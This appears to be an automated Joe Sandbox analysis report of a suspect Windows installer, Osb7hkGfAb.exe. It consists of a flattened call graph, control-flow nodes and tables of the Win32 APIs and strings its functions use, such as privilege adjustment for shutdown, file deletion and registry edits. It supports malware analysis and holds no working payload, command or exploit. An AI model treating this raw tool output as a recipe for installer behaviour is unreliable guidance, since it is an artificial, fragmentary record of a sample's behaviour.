GetModuleHandleA 4540->4542 4540->4550 4541 6ff81bbd GlobalAlloc 4560 6ff81aca 4541->4560 4545 6ff82139 4542->4545 4546 6ff82124 LoadLibraryA 4542->4546 4543 6ff81c08 lstrcpyA 4547 6ff81c12 lstrcpyA 4543->4547 4544 6ff81c26 GlobalFree 4544->4560 4635 6ff815c2 GetProcAddress 4545->4635 4546->4545 4546->4550 4547->4560 4548->4550 4631 6ff81224 4548->4631 4550->4492 4551 6ff8218a 4551->4550 4555 6ff82197 lstrlenA 4551->4555 4552 6ff81fb7 4634 6ff81215 GlobalAlloc 4552->4634 4636 6ff815c2 GetProcAddress 4555->4636 4556 6ff81ef9 GlobalFree 4556->4560 4557 6ff82033 4557->4550 4563 6ff8208c lstrcpyA 4557->4563 4558 6ff8214b 4558->4551 4564 6ff82174 GetProcAddress 4558->4564 4560->4538 4560->4541 4560->4543 4560->4544 4560->4547 4560->4550 4560->4552 4560->4556 4560->4557 4561 6ff81224 2 API calls 4560->4561 4629 6ff81534 GlobalSize GlobalAlloc 4560->4629 4561->4560 4563->4550 4564->4551 4565 6ff81fbf 4565->4492 4574 6ff8230a 4566->4574 4567 6ff81224 GlobalAlloc lstrcpynA 4567->4574 4569 6ff82446 GlobalFree 4571 6ff81730 4569->4571 4569->4574 4570 6ff823b8 GlobalAlloc MultiByteToWideChar 4572 6ff823e4 GlobalAlloc CLSIDFromString GlobalFree 4570->4572 4573 6ff82405 4570->4573 4571->4500 4571->4501 4571->4515 4572->4569 4573->4569 4642 6ff82646 4573->4642 4574->4567 4574->4569 4574->4570 4574->4573 4638 6ff812ad 4574->4638 4578 6ff82a4a 4576->4578 4577 6ff82aef VirtualAllocEx 4581 6ff82b0d 4577->4581 4578->4577 4580 6ff82bd9 4580->4515 4645 6ff829e4 4581->4645 4583 6ff822c4 4582->4583 4584 6ff81729 4583->4584 4585 6ff822cf GlobalAlloc 4583->4585 4584->4494 4585->4583 4590 6ff826e2 4586->4590 4587 6ff8277d GlobalAlloc 4591 6ff827a0 4587->4591 4588 6ff82790 4589 6ff82796 GlobalSize 4588->4589 4588->4591 4589->4591 4590->4587 4590->4588 4591->4520 4594 6ff82cce 4592->4594 4593 6ff82d0e GlobalFree 4594->4593 4649 6ff81215 GlobalAlloc 4595->4649 4597 6ff82598 WideCharToMultiByte 4603 6ff824e4 4597->4603 4598 6ff82563 lstrcpynA 4598->4603 4599 6ff82574 StringFromGUID2 WideCharToMultiByte 4599->4603 4600 6ff825b9 wsprintfA 4600->4603 4601 6ff825dd GlobalFree 4601->4603 4602 6ff82617 GlobalFree 4602->4508 4603->4597 4603->4598 4603->4599 4603->4600 4603->4601 4603->4602 4604 6ff81266 2 API calls 4603->4604 4650 6ff812d1 4603->4650 4604->4603 4654 6ff81215 GlobalAlloc 4606->4654 4608 6ff8155e 4609 6ff8156b 2 API calls 4608->4609 4610 6ff81568 4609->4610 4611 6ff81266 4610->4611 4612 6ff812a8 GlobalFree 4611->4612 4613 6ff8126f GlobalAlloc lstrcpynA 4611->4613 4612->4518 4613->4612 4615 6ff815a4 lstrcpyA 4614->4615 4616 6ff81577 wsprintfA 4614->4616 4619 6ff815bd 4615->4619 4616->4619 4619->4521 4621 6ff824ac 4620->4621 4623 6ff817ef 4620->4623 4622 6ff824c5 GlobalFree 4621->4622 4621->4623 4622->4621 4623->4526 4623->4528 4625 6ff81266 2 API calls 4624->4625 4626 6ff81503 4625->4626 4626->4530 4627->4536 4628->4560 4630 6ff81552 4629->4630 4630->4560 4637 6ff81215 GlobalAlloc 4631->4637 4633 6ff81233 lstrcpynA 4633->4550 4634->4565 4635->4558 4636->4550 4637->4633 4639 6ff812b4 4638->4639 4640 6ff81224 2 API calls 4639->4640 4641 6ff812cf 4640->4641 4641->4574 4643 6ff826aa 4642->4643 4644 6ff82654 VirtualAlloc 4642->4644 4643->4573 4644->4643 4646 6ff829ef 4645->4646 4647 6ff829ff 4646->4647 4648 6ff829f4 GetLastError 4646->4648 4647->4580 4648->4647 4649->4603 4651 6ff812f9 4650->4651 4652 6ff812da 4650->4652 4651->4603 4652->4651 4653 6ff812e0 lstrcpyA 4652->4653 4653->4651 4654->4608 4655 40159d 4656 402bce 17 API calls 4655->4656 4657 4015a4 SetFileAttributesA 4656->4657 4658 4015b6 4657->4658 5501 40149d 5502 402387 5501->5502 5503 4014ab PostQuitMessage 5501->5503 5503->5502 5504 401a1e 5505 402bce 17 API calls 5504->5505 5506 401a27 ExpandEnvironmentStringsA 5505->5506 5507 401a3b 5506->5507 5509 401a4e 5506->5509 5508 401a40 lstrcmpA 5507->5508 5507->5509 5508->5509 4659 40171f 4660 402bce 17 API calls 4659->4660 4661 401726 SearchPathA 4660->4661 4662 401741 4661->4662 5515 401d1f 5516 402bac 17 API calls 5515->5516 5517 401d26 5516->5517 5518 402bac 17 API calls 5517->5518 5519 401d32 GetDlgItem 5518->5519 5520 402620 5519->5520 4670 402421 4671 402453 4670->4671 4672 402428 4670->4672 4674 402bce 17 API calls 4671->4674 4673 402c0e 17 API calls 4672->4673 4675 40242f 4673->4675 4676 40245a 4674->4676 4677 402439 4675->4677 4680 402467 4675->4680 4682 402c8c 4676->4682 4679 402bce 17 API calls 4677->4679 4681 402440 RegDeleteValueA RegCloseKey 4679->4681 4681->4680 4683 402c98 4682->4683 4684 402c9f 4682->4684 4683->4680 4684->4683 4686 402cd0 4684->4686 4687 405f7d RegOpenKeyExA 4686->4687 4688 402cfe 4687->4688 4689 402db3 4688->4689 4690 402d08 4688->4690 4689->4683 4691 402d0e RegEnumValueA 4690->4691 4700 402d31 4690->4700 4692 402d98 RegCloseKey 4691->4692 4691->4700 4692->4689 4693 402d6d RegEnumKeyA 4694 402d76 RegCloseKey 4693->4694 4693->4700 4695 406500 5 API calls 4694->4695 4696 402d86 4695->4696 4698 402da8 4696->4698 4699 402d8a RegDeleteKeyA 4696->4699 4697 402cd0 6 API calls 4697->4700 4698->4689 4699->4689 4700->4692 4700->4693 4700->4694 4700->4697 4701 4027a1 4702 402bce 17 API calls 4701->4702 4703 4027a8 FindFirstFileA 4702->4703 4704 4027cb 4703->4704 4708 4027bb 4703->4708 4705 4027d2 4704->4705 4709 406055 wsprintfA 4704->4709 4710 4060f7 lstrcpynA 4705->4710 4709->4705 4710->4708 5521 402626 5522 40262b 5521->5522 5523 40263f 5521->5523 5525 402bac 17 API calls 5522->5525 5524 402bce 17 API calls 5523->5524 5526 402646 lstrlenA 5524->5526 5527 402634 5525->5527 5526->5527 5528 405d37 WriteFile 5527->5528 5529 402668 5527->5529 5528->5529 5530 403ca7 5531 403dfa 5530->5531 5532 403cbf 5530->5532 5534 403e4b 5531->5534 5535 403e0b GetDlgItem GetDlgItem 5531->5535 5532->5531 5533 403ccb 5532->5533 5536 403cd6 SetWindowPos 5533->5536 5537 403ce9 5533->5537 5539 403ea5 5534->5539 5547 401389 2 API calls 5534->5547 5538 40417b 18 API calls 5535->5538 5536->5537 5541 403d06 5537->5541 5542 403cee ShowWindow 5537->5542 5543 403e35 SetClassLongA 5538->5543 5540 4041c7 SendMessageA 5539->5540 5558 403df5 5539->5558 5589 403eb7 5540->5589 5544 403d28 5541->5544 5545 403d0e DestroyWindow 5541->5545 5542->5541 5546 40140b 2 API calls 5543->5546 5548 403d2d SetWindowLongA 5544->5548 5549 403d3e 5544->5549 5598 404104 5545->5598 5546->5534 5550 403e7d 5547->5550 5548->5558 5553 403d4a GetDlgItem 5549->5553 5568 403db5 5549->5568 5550->5539 5554 403e81 SendMessageA 5550->5554 5551 40140b 2 API calls 5551->5589 5552 404106 DestroyWindow EndDialog 5552->5598 5557 403d5d SendMessageA IsWindowEnabled 5553->5557 5560 403d7a 5553->5560 5554->5558 5555 4041e2 8 API calls 5555->5558 5556 404135 ShowWindow 5556->5558 5557->5558 5557->5560 5559 40618a 17 API calls 5559->5589 5561 403d87 5560->5561 5562 403dce SendMessageA 5560->5562 5563 403d9a 5560->5563 5571 403d7f 5560->5571 5561->5562 5561->5571 5562->5568 5566 403da2 5563->5566 5567 403db7 5563->5567 5564 404154 SendMessageA 5564->5568 5565 40417b 18 API calls 5565->5589 5569 40140b 2 API calls 5566->5569 5570 40140b 2 API calls 5567->5570 5568->5555 5569->5571 5570->5571 5571->5564 5571->5568 5572 40417b 18 API calls 5573 403f32 GetDlgItem 5572->5573 5574 403f47 5573->5574 5575 403f4f ShowWindow EnableWindow 5573->5575 5574->5575 5599 40419d EnableWindow 5575->5599 5577 403f79 EnableWindow 5582 403f8d 5577->5582 5578 403f92 GetSystemMenu EnableMenuItem SendMessageA 5579 403fc2 SendMessageA 5578->5579 5578->5582 5579->5582 5581 403c88 18 API calls 5581->5582 5582->5578 5582->5581 5600 4041b0 SendMessageA 5582->5600 5601 4060f7 lstrcpynA 5582->5601 5584 403ff1 lstrlenA 5585 40618a 17 API calls 5584->5585 5586 404002 SetWindowTextA 5585->5586 5587 401389 2 API calls 5586->5587 5587->5589 5588 404046 DestroyWindow 5590 404060 CreateDialogParamA 5588->5590 5588->5598 5589->5551 5589->5552 5589->5558 5589->5559 5589->5565 5589->5572 5589->5588 5591 404093 5590->5591 5590->5598 5592 40417b 18 API calls 5591->5592 5593 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5592->5593 5594 401389 2 API calls 5593->5594 5595 4040e4 5594->5595 5595->5558 5596 4040ec ShowWindow 5595->5596 5597 4041c7 SendMessageA 5596->5597 5597->5598 5598->5556 5598->5558 5599->5577 5600->5582 5601->5584 4743 40272b 4744 402732 4743->4744 4745 4029aa 4743->4745 4746 402bac 17 API calls 4744->4746 4747 402739 4746->4747 4748 402748 SetFilePointer 4747->4748 4748->4745 4749 402758 4748->4749 4751 406055 wsprintfA 4749->4751 4751->4745 4762 401c2e 4763 402bac 17 API calls 4762->4763 4764 401c35 4763->4764 4765 402bac 17 API calls 4764->4765 4766 401c42 4765->4766 4767 401c57 4766->4767 4768 402bce 17 API calls 4766->4768 4769 401c67 4767->4769 4770 402bce 17 API calls 4767->4770 4768->4767 4771 401c72 4769->4771 4772 401cbe 4769->4772 4770->4769 4773 402bac 17 API calls 4771->4773 4774 402bce 17 API calls 4772->4774 4776 401c77 4773->4776 4775 401cc3 4774->4775 4777 402bce 17 API calls 4775->4777 4778 402bac 17 API calls 4776->4778 4779 401ccc FindWindowExA 4777->4779 4780 401c83 4778->4780 4783 401cea 4779->4783 4781 401c90 SendMessageTimeoutA 4780->4781 4782 401cae SendMessageA 4780->4782 4781->4783 4782->4783 5602 4042b1 lstrcpynA lstrlenA 4790 401e35 GetDC 4791 402bac 17 API calls 4790->4791 4792 401e47 GetDeviceCaps MulDiv ReleaseDC 4791->4792 4793 402bac 17 API calls 4792->4793 4794 401e78 4793->4794 4795 40618a 17 API calls 4794->4795 4796 401eb5 CreateFontIndirectA 4795->4796 4797 402620 4796->4797 5603 402a35 SendMessageA 5604 402a5a 5603->5604 5605 402a4f InvalidateRect 5603->5605 5605->5604 5606 4014b7 5607 4014bd 5606->5607 5608 401389 2 API calls 5607->5608 5609 4014c5 5608->5609 5610 6ff81000 5611 6ff8101b 5 API calls 5610->5611 5612 6ff81019 5611->5612 5613 402dba 5614 402dc9 SetTimer 5613->5614 5616 402de2 5613->5616 5614->5616 5615 402e37 5616->5615 5617 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5616->5617 5617->5615 4844 4015bb 4845 402bce 17 API calls 4844->4845 4846 4015c2 4845->4846 4847 405b28 4 API calls 4846->4847 4861 4015ca 4847->4861 4848 401624 4850 401629 4848->4850 4852 401652 4848->4852 4849 405aba CharNextA 4849->4861 4851 401423 24 API calls 4850->4851 4854 401630 4851->4854 4853 401423 24 API calls 4852->4853 4860 40164a 4853->4860 4863 4060f7 lstrcpynA 4854->4863 4855 405761 2 API calls 4855->4861 4857 40577e 5 API calls 4857->4861 4858 40163b SetCurrentDirectoryA 4858->4860 4859 40160c GetFileAttributesA 4859->4861 4861->4848 4861->4849 4861->4855 4861->4857 4861->4859 4862 4056e4 4 API calls 4861->4862 4862->4861 4863->4858 5618 4016bb 5619 402bce 17 API calls 5618->5619 5620 4016c1 GetFullPathNameA 5619->5620 5621 4016d8 5620->5621 5627 4016f9 5620->5627 5623 40646b 2 API calls 5621->5623 5621->5627 5622 40170d GetShortPathNameA 5624 402a5a 5622->5624 5625 4016e9 5623->5625 5625->5627 5628 4060f7 lstrcpynA 5625->5628 5627->5622 5627->5624 5628->5627

                                                                  Executed Functions

                                                                  Function 00403348 Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 7 403393 1->7 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 7->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 21 4033da 17->21 21->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 43 4035b4-4035ce DeleteFileA call 402ea1 33->43 44 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->44 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 52 403524 37->52 41 4034a5-4034d2 38->41 42 40348f-403495 38->42 49 4034d4-4034da 41->49 50 4034e5-403513 41->50 47 403497-403499 42->47 48 40349b 42->48 58 403662-403672 call 403830 OleUninitialize 43->58 59 4035d4-4035da 43->59 44->43 61 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 44->61 47->41 47->48 48->41 54 4034e0 49->54 55 4034dc-4034de 49->55 50->37 57 403531-40353d call 4060f7 50->57 52->28 54->50 55->50 55->54 57->33 72 403796-40379c 58->72 73 403678-403688 call 405813 ExitProcess 58->73 62 403652-403659 call 40390a 59->62 63 4035dc-4035e7 call 405aba 59->63 61->43 61->58 70 40365e 62->70 74 4035e9-403612 63->74 75 40361d-403627 63->75 70->58 77 403818-403820 72->77 78 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->78 79 403614-403616 74->79 82 403629-403636 call 405b7d 75->82 83 40368e-4036a2 call 40577e lstrcatA 75->83 80 403822 77->80 81 403826-40382a ExitProcess 77->81 85 4037e9-4037f7 call 406500 78->85 86 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 88 403618-40361b 79->88 80->81 82->58 96 403638-40364e call 4060f7 * 2 82->96 97 4036a4-4036aa lstrcatA 83->97 98 4036af-4036c9 lstrcatA lstrcmpiA 83->98 94 403805-40380f ExitWindowsEx 85->94 95 4037f9-403803 85->95 86->85 88->75 88->79 94->77 100 403811-403813 call 40140b 94->100 95->94 95->100 96->62 97->98 98->58 99 4036cb-4036ce 98->99 103 4036d0-4036d5 call 4056e4 99->103 104 4036d7 call 405761 99->104 100->77 112 4036dc-4036e9 SetCurrentDirectoryA 103->112 104->112 113 4036f6-40371e call 4060f7 112->113 114 4036eb-4036f1 call 4060f7 112->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 124 40378a-403791 call 405ed6 121->124 122->121 123 403754-403774 call 405ed6 call 40618a call 405796 122->123 123->121 133 403776-40377d CloseHandle 123->133 124->58 133->121
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 0040336D
                                                                  • GetVersion.KERNEL32 ref: 00403373
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                  • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                  • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                  • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                  • GetCommandLineA.KERNEL32(datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000020,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                  • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                    • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76F93410), ref: 004039FA
                                                                    • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                    • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                    • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                    • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                    • Part of subcall function 00403830: CloseHandle.KERNEL32(000002B8,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                  • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                  • ExitProcess.KERNEL32 ref: 00403688
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                  • ExitProcess.KERNEL32 ref: 0040382A
                                                                    • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                  • String ID: "$"C:\Users\user\Desktop\Osb7hkGfAb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$datastrrelsers Setup$~nsu
                                                                  • API String ID: 3776617018-2984032998
                                                                  • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                  • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                  • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                  • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                  Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 337 4058bf-4058e5 call 405b7d 340 4058e7-4058f9 DeleteFileA 337->340 341 4058fe-405905 337->341 342 405a88-405a8c 340->342 343 405907-405909 341->343 344 405918-405928 call 4060f7 341->344 345 405a36-405a3b 343->345 346 40590f-405912 343->346 352 405937-405938 call 405ad6 344->352 353 40592a-405935 lstrcatA 344->353 345->342 348 405a3d-405a40 345->348 346->344 346->345 350 405a42-405a48 348->350 351 405a4a-405a52 call 40646b 348->351 350->342 351->342 361 405a54-405a68 call 405a8f call 405877 351->361 354 40593d-405940 352->354 353->354 357 405942-405949 354->357 358 40594b-405951 lstrcatA 354->358 357->358 360 405956-405974 lstrlenA FindFirstFileA 357->360 358->360 362 40597a-405991 call 405aba 360->362 363 405a2c-405a30 360->363 373 405a80-405a83 call 40521e 361->373 374 405a6a-405a6d 361->374 371 405993-405997 362->371 372 40599c-40599f 362->372 363->345 365 405a32 363->365 365->345 371->372 375 405999 371->375 376 4059a1-4059a6 372->376 377 4059b2-4059c0 call 4060f7 372->377 373->342 374->350 379 405a6f-405a7e call 40521e call 405ed6 374->379 375->372 381 4059a8-4059aa 376->381 382 405a0b-405a1d FindNextFileA 376->382 387 4059c2-4059ca 377->387 388 4059d7-4059e2 call 405877 377->388 379->342 381->377 386 4059ac-4059b0 381->386 382->362 385 405a23-405a26 FindClose 382->385 385->363 386->377 386->382 387->382 390 4059cc-4059d5 call 4058bf 387->390 397 405a03-405a06 call 40521e 388->397 398 4059e4-4059e7 388->398 390->382 397->382 400 4059e9-4059f9 call 40521e call 405ed6 398->400 401 4059fb-405a01 398->401 400->382 401->382
                                                                  APIs
                                                                  • DeleteFileA.KERNELBASE(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                  • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                  • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                  • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                  • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                  • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 004058BF
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                  • \*.*, xrefs: 0040592A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-2346750086
                                                                  • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                  • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                  • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                  • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                  Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                  Strings
                                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                  • API String ID: 123533781-3491094995
                                                                  • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                  • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                  • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                  • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                  Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
